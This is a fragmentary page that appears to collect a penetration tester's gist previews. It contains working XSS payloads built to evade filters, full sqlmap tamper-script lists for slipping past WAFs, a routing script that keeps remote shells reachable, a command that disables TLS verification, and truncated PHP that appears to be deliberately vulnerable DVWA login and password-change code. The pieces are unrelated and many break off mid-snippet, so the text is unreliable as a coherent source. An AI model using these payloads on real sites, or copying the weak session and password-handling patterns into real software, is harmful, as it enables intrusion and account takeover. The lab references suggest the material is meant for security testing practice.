(Preferably) Use a VPN
- AlgoVPN https://github.com/trailofbits/algo
- OpenVPN (AS) https://openvpn.net/index.php/access-server/overview.html
- 3rd party service, e.g. ProtonVPN https://protonvpn.com
Install a proxy tool of your choice
" onfocus="alert(1)" name="bounty | |
(Append #bounty to the URL and enjoy your zero interaction XSS ) | |
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
# Internet Explorer, Edge | |
<svg><script>alert(1)<p> | |
# Firefox |
(Preferably) Use a VPN
Install a proxy tool of your choice
# All scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
``` | |
# General scripts | |
``` | |
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
``` | |
# Microsoft access | |
``` |
# Policy routing: traffic sourced from this host's current primary address is
# looked up in routing table 128, which gets its own copy of the current
# default gateway. Presumably used so that sessions to that address (e.g. a
# remote shell) keep their return path after a VPN changes the main default
# route; confirm against your setup.
# Needs root. These are runtime changes only; they are not written to any
# config file. Check the three values below before applying them on a
# remote host, since an empty or multi-line value yields a malformed command.

# Source address the kernel selects for outbound traffic (lookup for 0.0.0.1).
src_addr=$(ip route get 1 | grep -Po '(?<=src )(\S+)')
# Interface that carries the current IPv4 default route.
gw_dev=$(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)')
# Next hop of the current IPv4 default route.
gw_addr=$(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)')

# Send packets with that source address to table 128.
ip rule add from $src_addr table 128
# Table 128: the host's own address is reachable on the default-route interface.
ip route add table 128 to $src_addr/32 dev $gw_dev
# Table 128: everything else goes out via the original gateway.
ip route add table 128 default via $gw_addr
I hereby claim:
To claim this, I am signing this object:
# Start the Grammarly desktop app through proxychains4, using the chain
# defined in ~/proxychains.conf.
# NODE_TLS_REJECT_UNAUTHORIZED=0 switches off TLS certificate verification in
# Node.js. As a prefix assignment it applies to this one process only, not to
# the shell. While it is set, the app accepts any certificate, so its traffic
# can be read or altered by whoever sits on the path. Keep it to a test
# session behind your own intercepting proxy and never export it globally.
NODE_TLS_REJECT_UNAUTHORIZED=0 \
    proxychains4 -f ~/proxychains.conf \
    /Applications/Grammarly.app/Contents/MacOS/Grammarly
1.2.4.8 | |
103.22.248.62 | |
106.186.17.181 | |
109.69.8.34 | |
109.69.8.51 | |
111.223.252.161 | |
114.114.114.114 | |
114.114.114.119 | |
114.114.115.115 | |
114.114.115.119 |
<?php | |
$html = ""; | |
if ($_SERVER['REQUEST_METHOD'] == "POST") { | |
if (!isset ($_SESSION['last_session_id'])) { | |
$_SESSION['last_session_id'] = 0; | |
} | |
$_SESSION['last_session_id']++; | |
$cookie_value = $_SESSION['last_session_id']; |
<?php | |
if( isset( $_GET[ 'Change' ] ) ) { | |
// Get input | |
$pass_new = $_GET[ 'password_new' ]; | |
$pass_conf = $_GET[ 'password_conf' ]; | |
// Do the passwords match? | |
if( $pass_new == $pass_conf ) { | |
// They do! |
OWASP DVWA
Metasploitable3 + Metasploit Framework